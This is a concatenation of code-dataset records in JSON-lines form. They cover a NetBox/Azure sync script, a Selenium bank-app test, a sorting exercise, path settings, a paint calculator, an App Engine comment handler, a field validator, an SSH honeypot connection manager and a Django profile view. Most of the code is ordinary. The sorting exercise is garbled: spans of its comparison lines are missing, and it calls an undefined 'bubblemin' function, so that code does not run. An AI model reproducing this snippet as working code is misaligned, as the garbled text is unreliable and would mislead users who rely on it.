\"virtual_interfaces\":\n query = \"?virtual_machine={}&{}={}\".format(\n az_data[\"virtual_machine\"][\"name\"], query_key,\n az_data[query_key]\n )\n else:\n query = \"?{}={}\".format(query_key, az_data[query_key])\n req = self.request(\n req_type=\"get\", nb_obj_type=nb_obj_type,\n query=query\n )\n # Users have the option to avoid updating prefixes that have already\n # been created by other means.\n if req[\"count\"] == 1 and nb_obj_type == \"prefixes\" \\\n and \"Azure\" not in req[\"results\"][0][\"tags\"] \\\n and not settings.NB_OVERWRITE_PREFIXES:\n log.info(\n \"NetBox %s object '%s' already exists with no 'Azure' tag and \"\n \"the overwrite prefixes setting is currently False. Skipping \"\n \"update.\", nb_obj_type, az_data[query_key]\n )\n # A single matching object is found so we compare its values to the new\n # object\n elif req[\"count\"] == 1:\n log.debug(\n \"NetBox %s object '%s' already exists. Comparing values.\",\n nb_obj_type, az_data[query_key]\n )\n nb_data = req[\"results\"][0]\n # Objects that have been previously tagged as orphaned but then\n # reappear in Azure need to be stripped of their orphaned status\n if \"tags\" in az_data and \"Orphaned\" in nb_data[\"tags\"]:\n log.info(\n \"NetBox %s object '%s' is currently marked as orphaned \"\n \"but has reappeared in Azure. Updating NetBox.\",\n nb_obj_type, az_data[query_key]\n )\n self.request(\n req_type=\"put\", nb_obj_type=nb_obj_type, data=az_data,\n nb_id=nb_data[\"id\"]\n )\n elif compare_dicts(\n az_data, nb_data, dict1_name=\"az_data\",\n dict2_name=\"nb_data\"):\n log.info(\n \"NetBox %s object '%s' match current values. 
Moving on.\",\n nb_obj_type, az_data[query_key]\n )\n else:\n log.info(\n \"NetBox %s object '%s' do not match current values.\",\n nb_obj_type, az_data[query_key]\n )\n if \"tags\" in az_data:\n log.debug(\"Merging tags between Azure and NetBox object.\")\n az_data[\"tags\"] = list(\n set(az_data[\"tags\"] + nb_data[\"tags\"])\n )\n self.request(\n req_type=\"put\", nb_obj_type=nb_obj_type, data=az_data,\n nb_id=nb_data[\"id\"]\n )\n elif req[\"count\"] > 1:\n log.warning(\n \"Search for NetBox %s object '%s' returned %s results but \"\n \"should have only returned 1. Please manually review and \"\n \"report this if the data is accurate. Skipping for safety.\",\n nb_obj_type, az_data[query_key], req[\"count\"]\n )\n else:\n log.info(\n \"Netbox %s '%s' object not found. Requesting creation.\",\n nb_obj_type,\n az_data[query_key],\n )\n self.request(\n req_type=\"post\", nb_obj_type=nb_obj_type, data=az_data\n )\n\n def sync_objects(self, az_obj_type):\n \"\"\"\n Collect resources of type from Azure and syncs them to NetBox.\n\n Some NB object types do not support tags so they will be a one-way sync\n meaning orphaned objects will not be removed from NetBox.\n \"\"\"\n # Collect data from Azure\n log.info(\n \"Initiated sync of Azure %s objects to NetBox.\",\n az_obj_type[:-1]\n )\n # Dynamically accept any of the AzureHandler class get_ functions\n az_objects = getattr(AzureHandler(), \"get_{}\".format(az_obj_type))()\n nb_obj_types = list(az_objects.keys())\n for nb_obj_type in nb_obj_types:\n log.info(\n \"Starting sync of %s Azure %s object%s to NetBox %s \"\n \"object%s.\",\n len(az_objects[nb_obj_type]),\n az_obj_type,\n \"s\" if len(az_objects[nb_obj_type]) != 1 else \"\",\n nb_obj_type,\n \"s\" if len(az_objects[nb_obj_type]) != 1 else \"\",\n )\n for obj in az_objects[nb_obj_type]:\n # Check to ensure IP addresses pass all checks before syncing\n # to NetBox\n if nb_obj_type in [\"ip_addresses\", \"prefixes\"]:\n ip_addr = (\n obj[\"address\"] if nb_obj_type == \"ip_addresses\"\n else obj[\"prefix\"] if nb_obj_type == \"prefixes\" else \"\"\n )\n if verify_ip(ip_addr):\n log.debug(\n \"IP %s has passed necessary pre-checks.\",\n ip_addr\n )\n # Search for parent prefix to assign VRF and tenancy\n prefix = self.search_prefix(ip_addr)\n # Update placeholder values with matched values\n obj[\"vrf\"] = prefix[\"vrf\"]\n obj[\"tenant\"] = prefix[\"tenant\"]\n else:\n log.debug(\n \"IP %s has failed necessary pre-checks. Skipping \"\n \"sync to NetBox.\", ip_addr,\n )\n continue\n self.obj_exists(nb_obj_type=nb_obj_type, az_data=obj)\n log.info(\n \"Finished sync of %s Azure %s object%s to NetBox %s \"\n \"object%s.\",\n len(az_objects[nb_obj_type]),\n az_obj_type,\n \"s\" if len(az_objects[nb_obj_type]) != 1 else \"\",\n nb_obj_type,\n \"s\" if len(az_objects[nb_obj_type]) != 1 else \"\",\n )\n # Send Azure objects to the pruner\n if settings.NB_PRUNE_ENABLED:\n self.prune_objects(az_objects, az_obj_type)\n\n def prune_objects(self, az_objects, az_obj_type):\n \"\"\"\n Collects NetBox objects and checks if they still exist in Azure.\n\n If NetBox objects are not found in the supplied az_objects data then\n they will go through a pruning process.\n\n az_objects: Dictionary of Azure object types and list of their objects\n az_obj_type: The parent object type called during the sync. 
This is\n used to determine whether special filtering needs to be applied.\n \"\"\"\n # Determine which of our NetBox objects types support pruning\n nb_obj_types = [t for t in az_objects if self.obj_map[t][\"prune\"]]\n # Sort NetBox object types by pruning priority. This ensures\n # we do not have issues with deleting objects with dependencies.\n nb_obj_types = sorted(\n nb_obj_types, key=lambda t: self.obj_map[t][\"prune_pref\"],\n reverse=True\n )\n for nb_obj_type in nb_obj_types:\n log.info(\n \"Comparing existing NetBox %s objects to current Azure \"\n \"objects for pruning eligibility.\", nb_obj_type\n )\n nb_objects = self.request(\n req_type=\"get\", nb_obj_type=nb_obj_type,\n # Tags need to always be searched by slug\n query=\"?tag={}\".format(format_slug(\"Azure\"))\n )[\"results\"]\n # Issue 33: As of NetBox v2.6.11 it is not possible to filter\n # virtual interfaces by tag. Therefore we filter post collection.\n if az_obj_type == \"vms\" and \\\n nb_obj_type == \"virtual_interfaces\":\n nb_objects = [\n obj for obj in nb_objects\n if \"Azure\" in obj[\"tags\"]\n ]\n log.debug(\n \"Found %s virtual interfaces with tag 'Azure'.\",\n len(nb_objects)\n )\n elif az_obj_type == \"vms\" and \\\n nb_obj_type == \"ip_addresses\":\n nb_objects = [\n obj for obj in nb_objects\n if obj[\"interface\"][\"virtual_machine\"] is not None\n ]\n # NetBox object types do not have a standard key to search and\n # filter them by therefore we look up the appropriate key\n query_key = self.obj_map[nb_obj_type][\"key\"]\n az_obj_values = [obj[query_key] for obj in az_objects[nb_obj_type]]\n orphans = [\n obj for obj in nb_objects if obj[query_key] not in az_obj_values\n ]\n log.info(\n \"Comparison completed. %s %s orphaned NetBox object%s did not \"\n \"match.\",\n len(orphans), nb_obj_type, \"s\" if len(orphans) != 1 else \"\"\n )\n log.debug(\"The following objects did not match: %s\", orphans)\n # Pruned items are checked against the prune timer\n # All pruned items are first tagged so it is clear why they were\n # deleted, and then those items which are greater than the max age\n # will be deleted permanently\n for orphan in orphans:\n log.info(\n \"Processing orphaned NetBox %s '%s' object.\",\n nb_obj_type, orphan[query_key]\n )\n if \"Orphaned\" not in orphan[\"tags\"]:\n log.info(\n \"No tag found. Adding 'Orphaned' tag to %s '%s' \"\n \"object.\",\n nb_obj_type, orphan[query_key]\n )\n tags = {\n \"tags\": [\"Synced\", \"Azure\", \"Orphaned\"]\n }\n self.request(\n req_type=\"patch\", nb_obj_type=nb_obj_type,\n nb_id=orphan[\"id\"],\n data=tags\n )\n # Check if the orphan has gone past the max prune timer and\n # needs to be deleted\n # Dates are in YY, MM, DD format\n current_date = date.today()\n # Some objects do not have a last_updated field so we must\n # handle that gracefully and send for deletion\n del_obj = False\n try:\n modified_date = date(\n int(orphan[\"last_updated\"][:4]), # Year\n int(orphan[\"last_updated\"][5:7]), # Month\n int(orphan[\"last_updated\"][8:10]) # Day\n )\n # Calculated timedelta then converts it to the days integer\n days_orphaned = (current_date - modified_date).days\n if days_orphaned >= settings.NB_PRUNE_DELAY_DAYS:\n log.info(\n \"The %s '%s' object has exceeded the %s day max \"\n \"for orphaned objects. Sending it for deletion.\",\n nb_obj_type, orphan[query_key],\n settings.NB_PRUNE_DELAY_DAYS\n )\n del_obj = True\n else:\n log.info(\n \"The %s '%s' object has been orphaned for %s of %s \"\n \"max days. 
Proceeding to next object.\",\n nb_obj_type, orphan[query_key], days_orphaned,\n settings.NB_PRUNE_DELAY_DAYS\n )\n except KeyError as err:\n log.debug(\n \"The %s '%s' object does not have a %s \"\n \"field. Sending it for deletion.\",\n nb_obj_type, orphan[query_key], err\n )\n del_obj = True\n if del_obj:\n self.request(\n req_type=\"delete\", nb_obj_type=nb_obj_type,\n nb_id=orphan[\"id\"],\n )\n\n def search_prefix(self, ip_addr):\n \"\"\"\n Queries Netbox for the parent prefix of any supplied IP address.\n\n Returns dictionary of VRF and tenant values.\n \"\"\"\n result = {\"tenant\": None, \"vrf\": None}\n query = \"?contains={}\".format(ip_addr)\n try:\n prefix_obj = self.request(\n req_type=\"get\", nb_obj_type=\"prefixes\", query=query\n )[\"results\"][-1] # -1 used to choose the most specific result\n prefix = prefix_obj[\"prefix\"]\n for key in result:\n # Ensure the data returned was not null.\n try:\n result[key] = {\"name\": prefix_obj[key][\"name\"]}\n except TypeError:\n log.debug(\n \"No %s key was found in the parent prefix. Nulling.\",\n key\n )\n result[key] = None\n log.debug(\n \"IP address %s is a child of prefix %s with the following \"\n \"attributes: %s\", ip_addr, prefix, result\n )\n except IndexError:\n log.debug(\"No parent prefix was found for IP %s.\", ip_addr)\n return result\n\n def verify_dependencies(self):\n \"\"\"\n Validates that all prerequisite NetBox objects exist and creates them.\n \"\"\"\n dependencies = {\n \"platforms\": [\n {\"name\": \"Windows\", \"slug\": \"windows\"},\n {\"name\": \"Linux\", \"slug\": \"linux\"},\n ],\n \"cluster_types\": [\n {\"name\": \"Public Cloud\", \"slug\": \"public-cloud\"}\n ],\n \"cluster_groups\": [\n {\"name\": \"Microsoft Azure\", \"slug\": \"microsoft-azure\"}\n ],\n \"device_roles\": [\n {\n \"name\": \"Server\",\n \"slug\": \"server\",\n \"color\": \"9e9e9e\",\n \"vm_role\": True\n }],\n \"tags\": [\n {\n \"name\": \"Orphaned\",\n \"slug\": \"orphaned\",\n \"color\": \"607d8b\",\n \"comments\": \"This applies to objects that have become \"\n \"orphaned. The source system which has \"\n \"previously provided the object no longer \"\n \"states it exists.{}\".format(\n \" An object with the 'Orphaned' tag will \"\n \"remain in this state until it ages out \"\n \"and is automatically removed.\"\n ) if settings.NB_PRUNE_ENABLED else \"\"\n },\n {\n \"name\": \"Azure\",\n \"slug\": \"azure\",\n \"comments\": \"Objects synced from Azure. 
Be careful not to \"\n \"modify the name or slug.\"\n }]\n }\n # For each dependency of each type verify object exists\n log.info(\"Verifying all prerequisite objects exist in NetBox.\")\n for dep_type in dependencies:\n log.debug(\n \"Checking NetBox has necessary %s objects.\", dep_type[:-1]\n )\n for dep in dependencies[dep_type]:\n self.obj_exists(nb_obj_type=dep_type, az_data=dep)\n log.info(\"Finished verifying prerequisites.\")\n\n def remove_all(self):\n \"\"\"\n Searches NetBox for all Azure synced objects and then removes them.\n\n This is intended to be used in the case you wish to start fresh or stop\n using the script.\n \"\"\"\n log.info(\n \"Preparing for the removal of all Azure objects synced to NetBox.\"\n )\n nb_obj_types = [\n t for t in self.obj_map if self.obj_map[t][\"prune\"]\n ]\n # Honor pruning preference, highest to lowest\n nb_obj_types = sorted(\n nb_obj_types, key=lambda t: self.obj_map[t][\"prune_pref\"],\n reverse=True\n )\n for nb_obj_type in nb_obj_types:\n log.info(\n \"Collecting all current NetBox %s objects to prepare for \"\n \"deletion.\", nb_obj_type\n )\n nb_objects = self.request(\n req_type=\"get\", nb_obj_type=nb_obj_type,\n query=\"?tag=azure\"\n )[\"results\"]\n # NetBox virtual interfaces do not currently support filtering\n # by tags. Therefore we collect all virtual interfaces and\n # filter them post collection.\n if nb_obj_type == \"virtual_interfaces\":\n log.debug(\"Collected %s virtual interfaces pre-filtering.\")\n nb_objects = [\n obj for obj in nb_objects if \"Azure\" in obj[\"tags\"]\n ]\n log.debug(\n \"Filtered to %s virtual interfaces with 'Azure' tag.\",\n len(nb_objects)\n )\n query_key = self.obj_map[nb_obj_type][\"key\"]\n log.info(\n \"Deleting %s NetBox %s objects.\", len(nb_objects), nb_obj_type\n )\n for obj in nb_objects:\n log.info(\n \"Deleting NetBox %s '%s' object.\", nb_obj_type,\n obj[query_key]\n )\n self.request(\n req_type=\"delete\", nb_obj_type=nb_obj_type,\n nb_id=obj[\"id\"],\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":49691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220801539","text":"import time\nimport unittest\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom Common_Package.BankApp_CommonFunctons import BankAPP_CommonFunctions\nfrom utility import Excelutility\nfrom Functionality_Account.TC_AddAccount import TC_AddAccountTest\n\n\nclass TC_DeleteAccountTest(unittest.TestCase):\n\n Path = BankAPP_CommonFunctions.excelPath\n Sheet_Name = BankAPP_CommonFunctions.sheet_AccountDetails\n Sheet_Verify = BankAPP_CommonFunctions.sheet_CustomerID\n\n # @classmethod\n # def setUpClass(cls):\n # cls.driver = webdriver.Chrome(executable_path=\"E:\\\\chromedriver_win32\\\\chromedriver.exe\")\n # cls.driver.maximize_window()\n # BankAPP_CommonFunctions.login_bankApp(cls.driver, BankAPP_CommonFunctions.username,\n # BankAPP_CommonFunctions.Password)\n # BankAPP_CommonFunctions.close_popup(cls.driver)\n\n @staticmethod\n def create_dummy_account(driver):\n total_row = Excelutility.get_row_count(TC_DeleteAccountTest.Path,TC_DeleteAccountTest.Sheet_Name)\n print(\"Total Row:\",total_row)\n last_cust_id = Excelutility.read_data(TC_DeleteAccountTest.Path,TC_DeleteAccountTest.Sheet_Name,total_row,1)\n print(\"Last Cust Id :\",last_cust_id)\n BankAPP_CommonFunctions.close_popup(driver)\n 
BankAPP_CommonFunctions.click_menu_by_perform_mouse_action(driver, \"New Acc\", \"new account\")\n TC_AddAccountTest.add_account_details(driver,last_cust_id,\"Savings\",3000)\n TC_AddAccountTest.validate_account_info(driver,\"Savings\",3000)\n total_row_after_addition = Excelutility.get_row_count(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name)\n print(\"Total row in excel after adding new account:\",total_row_after_addition)\n account_id_to_delete = Excelutility.read_data(TC_DeleteAccountTest.Path,TC_DeleteAccountTest.Sheet_Name,\n total_row_after_addition,2)\n print(\"Account Id to delete is :\",account_id_to_delete)\n return account_id_to_delete\n\n @staticmethod\n def search_acc_BYID_Delete(driver, id, action):\n driver.find_element_by_name(\"accountno\").send_keys(id)\n driver.find_element_by_css_selector(\"input[name='AccSubmit']\").click()\n time.sleep(2)\n msg = driver.switch_to.alert.text\n if \"Do you really want to delete this Account?\" in msg and action == \"No\":\n print(msg)\n driver.switch_to.alert.dismiss()\n elif \"Do you really want to delete this Account?\" in msg and action == \"Yes\":\n print(msg)\n driver.switch_to.alert.accept()\n wait = WebDriverWait(driver, 35)\n wait.until(EC.alert_is_present(), 'Timed out waiting for PA creation ' + 'confirmation popup to appear.')\n msgon_deletion = driver.switch_to.alert.text\n\n if \"Account does not exist\" in msgon_deletion:\n print(msgon_deletion)\n driver.switch_to.alert.accept()\n elif \"Account Deleted Sucessfully\" in msgon_deletion:\n print(msgon_deletion)\n driver.switch_to.alert.accept()\n driver.implicitly_wait(1)\n\n col, row = Excelutility.search_value_in_column(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name,\n id, \"B\")\n print(\"Row {0},Col {1}:\".format(row, col))\n total_row = Excelutility.get_row_count(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name)\n print(\"Total Row :\", total_row)\n\n if row != None:\n Excelutility.delete_row(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name, row, 1)\n\n if Excelutility.get_row_count(TC_DeleteAccountTest.Path,\n TC_DeleteAccountTest.Sheet_Name) == total_row - 1 and Excelutility.read_data(\n TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name, row, 1) != id:\n print(id + \" got deleted from xls\")\n elif Excelutility.get_row_count(TC_DeleteAccountTest.Path, TC_DeleteAccountTest.Sheet_Name) == total_row:\n print(id + \" not found in excel or already deleted!!!\")\n\n '''def test_delete_account(self):\n try:\n account_id_delete = TC_DeleteAccountTest.create_dummy_account(self.driver)\n BankAPP_CommonFunctions.click_menu_by_partial_link_text(self.driver,\"Delete Acc\",\"Delete Account\")\n TC_DeleteAccountTest.search_acc_BYID_Delete(self.driver,account_id_delete,\"Yes\")\n #TC_DeleteAccountTest.search_acc_BYID_Delete(self.driver,\"78433\",\"Yes\")\n except Exception as e:\n print(\"Exception from Delete Account:\", type(e).__name__)\n print('Error on line {} '.format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)'''\n\n # @classmethod\n # def tearDownClass(cls):\n # BankAPP_CommonFunctions.close_popup(cls.driver)\n # BankAPP_CommonFunctions.logout(cls.driver)\n # cls.driver.implicitly_wait(1)\n # cls.driver.close()\n\n\n# if __name__ == \"__main__\":\n# unittest.main()","sub_path":"Functionality_Account/TC_DeleteAccount.py","file_name":"TC_DeleteAccount.py","file_ext":"py","file_size_in_byte":5198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"6774510","text":"def bubblemax(ls):#从大到小排序\n for i in range(len(ls)-1):\n j=0\n while jls[j+1]:\n ls[j],ls[j+1]=ls[j+1],ls[j]\n j=j+1\n return ls\n\nnums1=input().split(\" \")\nnums2=input().split(\" \")\nk=int(nums2[0])\nm=int(nums2[0])\ns1=input()\ns2=input()\nj=0\nA=[]\nB=[]\nwhile s1.__contains__(\" \"):\n index=s1.index(\" \")\n A.append(int(s1[:index]))\n s1=s1[index+1:]\nA.append(int(s1))\nwhile s2.__contains__(\" \"):\n index=s2.index(\" \")\n B.append(int(s2[:index]))\n s2=s2[index+1:]\nB.append(int(s2))\nA=bubblemin(A)\nB=bubblemax(B)\n\nselectA=A[:k]\nselectB=B[:m]\n\nresult=\"\"\nif max(selectA)len(A) or m>len(B):\n result=\"NO\"\n \nprint(result)\n\n","sub_path":"Code/CodeRecords/2848/60796/276035.py","file_name":"276035.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"443351123","text":"import os\npathRes \t= os.path.abspath(r\"..\\..\\..\\res\")\npathSysRes \t= os.path.abspath(r\"..\\..\\..\\sys\\res\")\n\nDEBUG_PATH = True\n\nif DEBUG_PATH:\n\tpathRes \t= os.path.abspath(r\"../../debug_dir_res\")\n\tif not os.path.isdir(pathRes):\n\t\tpathRes = os.path.abspath(r\"../debug_dir_res\")\n\tpathSysRes \t= pathRes\n\n\n\nif not os.path.isdir(pathRes) or not os.path.isdir(pathSysRes):\n\tpathRes \t= os.path.abspath(r\"..\\..\\..\\..\\res\")\n\tpathSysRes \t= os.path.abspath(r\"..\\..\\..\\..\\sys\\res\")\n\nif not os.path.isdir(pathRes) or not os.path.isdir(pathSysRes):\n\traise ImportError(\"Not found game path, %s\"%pathRes)\n\ntmpWeaponDir = r\"weapons\"\npathWeaponJ = os.path.join(pathRes,r\"scripts\\common\\data\\weapon.json\")\npathWeapon = os.path.join(pathRes,r\"scripts\\common\\data\\weapon.pickle\")\npathLocalRusItemsNames = os.path.join(pathRes, \"local/Russian/ItemsNames.xml\")","sub_path":"widgets/wtsettings.py","file_name":"wtsettings.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"67637172","text":"#!/usr/bin/env python3\n\"\"\"\nAnother input pattern.\n\"\"\" \nPER_GALLON = 200 # A can of paint covers 200 square feet\nsq_ft = 0 \nwhile sq_ft == 0:\n said = input(\"Number of square feet to paint: \")\n if not said: # or if said == '':\n print(\"Thank you anyway.\") \n break\n try:\n sq_ft = int(said)\n except ValueError:\n print(\"Please give a whole number.\")\nelse:\n no_cans = sq_ft//PER_GALLON # // is integer division\n if sq_ft % PER_GALLON > 0: # Leftover after division\n no_cans += 1\n print(f\"You need {sq_ft/PER_GALLON:.1f} cans\"\n \" so you'd better buy\", end= ' ')\n else:\n print(\"You need exactly\", end=' ')\n print(f\"{no_cans} {'can' if no_cans==1 else 'cans'}.\")\n","sub_path":"python3/code/Lab02_input/paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301563582","text":"import os\nfrom google.appengine.ext import webapp\nfrom util import shared\nfrom model.media import Media\nfrom model.comment import Comment\nfrom google.appengine.api import users\n\nclass Details(webapp.RequestHandler):\n \n def get(self):\n media=self.getMedia(self.request.get('key'))\n if media:\n template_values = {\"media\":media}\n path = os.path.join(os.path.dirname(__file__), '../html/details.html')\n shared.render(self, path, template_values)\n \n \n def post(self):\n media=self.getMedia(self.request.get('key'))\n if media:\n 
comment=Comment()\n comment.title=self.request.get('title')\n u=users.get_current_user()\n if u:\n comment.by=u.nickname()\n else:\n comment.by=\"Mr. I'm too good to log in\"\n comment.text=self.request.get('text')\n commentkey=self.request.get('commentkey')\n if commentkey:\n comment.op=Comment.get(commentkey)\n else:\n comment.media=media\n comment.put()\n \n template_values = {\"media\":media}\n path = os.path.join(os.path.dirname(__file__), '../html/details.html')\n shared.render(self, path, template_values)\n \n def getMedia(self, key):\n if key:\n return Media.get(key)\n else:\n shared.do404(self)","sub_path":"SocialGuru/PolySocial/action/details.py","file_name":"details.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"539445315","text":"from functools import wraps\n\n\nclass Request:\n def __init__(self):\n self.body = {\n 'username': 'test001',\n 'age': 20.2\n }\n\n\nrequest = Request()\n\n\nclass DotDict(dict):\n \"\"\"使用'点'访问字典属性,无属性时返回None\"\"\"\n\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\n\nclass Fields:\n def __init__(self, zh_name=None, data_type=None, required=None, max_length=None):\n print('初始')\n self.is_valid = True\n self.error_message = '校验成功'\n self.zh_name = zh_name\n\n self.data_type = data_type\n self.required = required\n self.max_length = max_length\n\n def check_fail(self, error_message, custom=False):\n self.is_valid = False\n if not custom:\n self.error_message = '{}: {}'.format(self.zh_name or '参数', error_message)\n else:\n self.error_message = error_message\n return {\n 'is_valid': self.is_valid,\n 'error_message': self.error_message\n }\n\n @staticmethod\n def check_success():\n return {\n 'is_valid': True,\n 'error_message': '校验成功'\n }\n\n def _check_data_type(self, value):\n if isinstance(value, self.data_type):\n return True\n\n @staticmethod\n def _check_required(value):\n if value is not None or value != '':\n return True\n\n def _check_max_length(self, value):\n # 后期需考虑数据类型(字典、列表)\n return value <= len(str(self.max_length))\n\n def all_check(self, value, *args, **kwargs):\n if self.required:\n if value is None or value == '':\n return self.check_fail('不可为空')\n\n if self.max_length is not None:\n if len(str(value)) > self.max_length:\n return self.check_fail('长度不可大于{}'.format(self.max_length))\n\n return self.check_success()\n\n\nclass CharFields(Fields):\n def __init__(self, *args, **kwargs):\n super(CharFields, self).__init__(*args, **kwargs)\n\n def check(self, value):\n if not isinstance(value, str):\n return self.check_fail('数据类型错误')\n else:\n self.all_check(value)\n\n\nclass Login:\n username = CharFields('用户名', required=True, max_length=10)\n# age = IntegerFields()\n\n\nclass Validate:\n def __init__(self, scheme, data):\n self.scheme = scheme\n self.data = data\n\n def get_result(self):\n result = None\n json_data = DotDict(self.data.body)\n for key in dir(self.scheme)[::-1]:\n if not key.startswith('_'):\n value = json_data.__getattr__(key)\n result = getattr(self.scheme, key).check(value)\n # 加判断,错误时停止检查\n return result\n\n\ndef validator(scheme):\n def validator_decorator(func):\n @wraps(func)\n def wrapper(request):\n checker = Validate(scheme, request)\n result = checker.get_result()\n request.body['is_valid'] = result['is_valid']\n request.body['error_message'] = result['error_message']\n return func(request)\n\n return wrapper\n\n return validator_decorator\n\n# test = Validate(Login, 
request)\n# @ validator(Login)\n# def ApiLogin(request):\n# print(request.body['is_valid'])\n# print(request.body['error_message'])\n#\n# ApiLogin(request)\n\n\n\n\n\n","sub_path":"tmp1.py","file_name":"tmp1.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"62765326","text":"\"\"\"This module contains logic related to SSH\"\"\"\nimport logging\nimport socket\nimport threading\nfrom time import time\nimport urllib.request\nfrom re import Pattern\nfrom ipaddress import ip_address\nfrom typing import Optional\n\n\nimport paramiko\nfrom paramiko.ssh_exception import SSHException\n\nimport frontend.honeylogger as honeylogger\nfrom frontend.config import config\nfrom ._proxy_handler import ProxyHandler\nfrom ._transport_manager import TransportManager, TransportPair\nfrom ._ssh_server import Server\nfrom frontend.target_systems import TargetSystemProvider\n\nlogger = logging.getLogger(__name__)\n\n\nclass ConnectionManager(threading.Thread):\n \"\"\"ConnectionManager contains logic for listening for TCP connections\n and creating new threads of :class:`frontend.protocols.ssh.ConnectionManager`\"\"\"\n\n # The provider used to acquire target systems for each attacker connection\n _target_system_provider: TargetSystemProvider\n\n def __init__(self,\n target_system_provider: TargetSystemProvider,\n host_key: paramiko.PKey,\n usernames: Optional[Pattern] = None,\n passwords: Optional[Pattern] = None,\n socket_timeout: float = 5,\n max_unaccepted_connetions: int = 100,\n port: int = 22) -> None:\n \"\"\"Creates an instance of the ConnectionManager class which will start listening\n on the given port once the `start` method is called.\n\n\n :param host_key: The public key used by the server\n :param usernames: Allowed usernames, if it is None everything is allowed, defaults to None\n :param passwords: Allowed passwords, if it is None everything is allowed, defaults to None\n :param socket_timeout: The timeout of the socket, defaults to 5\n :param max_unaccepted_connetions: Max unaccepted connections, defaults to 100\n :param port: The port to listen on, defaults to 22\n \"\"\"\n super().__init__(target=self.listen, args=(socket_timeout,), daemon=False)\n self._transport_manager = TransportManager()\n self._target_system_provider = target_system_provider\n self._host_key = host_key\n self._usernames = usernames\n self._passwords = passwords\n self._max_unaccepted_connections = max_unaccepted_connetions\n self._port = port\n\n self._terminate = False\n self._lock = threading.Lock()\n\n self._ip = ip_address(urllib.request.urlopen('https://ident.me').read().decode('utf-8'))\n\n def stop(self) -> None:\n \"\"\"Stops the `listen` method listening for TCP connections\n \"\"\"\n logger.debug(\"Shutting down ConnectionManager\")\n with self._lock:\n self._terminate = True\n\n def start_ssh_server(self, client: socket.socket):\n \"\"\"Starts the SSH server for the givent client\n\n :param client: The socket object of the client connecting\n \"\"\"\n transport = paramiko.Transport(client)\n transport.local_version = config.SSH_LOCAL_VERSION\n transport.add_server_key(self._host_key)\n\n src = client.getpeername()[0]\n src_port = client.getpeername()[1]\n\n session = honeylogger.create_ssh_session(\n src_address=ip_address(src),\n src_port=src_port,\n dst_address=self._ip,\n dst_port=self._port)\n\n proxy_handler = ProxyHandler(session, self._target_system_provider)\n server = Server(\n transport,\n session,\n 
proxy_handler,\n self._usernames,\n self._passwords)\n\n start_time = time()\n logger.debug('Starting SSH server')\n try:\n transport.start_server(server=server)\n except SSHException:\n logger.exception(\"Failed to start the SSH server for %s\", src)\n return\n except EOFError:\n return\n except Exception as exc:\n logger.exception(\"Failed to start the SSH server for %s\", src, exc_info=exc)\n return\n finally:\n logger.debug('SSH server started in %fs', time()-start_time)\n\n self._transport_manager.add_transport(TransportPair(transport, proxy_handler, server))\n\n def listen(self, socket_timeout: float = 5) -> None:\n \"\"\"Starts listening for TCP connections on the given ports.\n runs new instances of :class:`frontend.protocols.ssh.ConnectionHandler` in new threads.\n\n :param socket_timeout:\n Seconds to wait before timeouting a connection attempt, defaults to 5\n \"\"\"\n try:\n # SOCK_STREAM is TCP\n # AF_INET is IPv4\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Permit reuse of local addresses for this socket\n # More information on options can be found here\n # https://www.gnu.org/software/libc/manual/html_node/Socket_002dLevel-Options.html\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((\"\", self._port))\n except Exception:\n logger.exception(\"Failed to bind the port %s\", self._port)\n raise\n\n try:\n sock.listen(self._max_unaccepted_connections)\n except Exception:\n logger.exception(\"Failed to listen to the socket\")\n raise\n\n sock.settimeout(socket_timeout)\n while True:\n with self._lock:\n if self._terminate:\n break\n\n # Try accepting connections\n try:\n client, _ = sock.accept()\n except socket.timeout:\n continue\n except Exception:\n logger.exception(\n \"Failed to accept a connection from somewhere\")\n continue\n\n threading.Thread(target=self.start_ssh_server, args=(client,), daemon=True).start()\n\n logger.debug(\"ConnectionManager has shut down\")\n self._transport_manager.stop()\n","sub_path":"frontend/frontend/protocols/ssh/connection_manager.py","file_name":"connection_manager.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"423109011","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.shortcuts import render, get_object_or_404\nfrom store.models import *\nfrom store.decorators import allowed_user\nfrom store.forms import UpdateCustomerForm, UpdateUserForm\n\n\n# menu page\n@login_required(login_url='/login')\n# @allowed_user(allowed_roles=['customer'])\ndef profile(request):\n if request.method == 'POST':\n user_form = UpdateUserForm(request.POST, instance=request.user)\n customer_form = UpdateCustomerForm(request.POST, request.FILES, instance=request.user.customer)\n\n if customer_form.is_valid() and user_form.is_valid():\n if request.FILES.get('profile_pic', False):\n Customer.objects.get(user=request.user).profile_pic.delete(save=True)\n user_form.save()\n customer_form.save()\n messages.success(request, 'Account updated!')\n else:\n 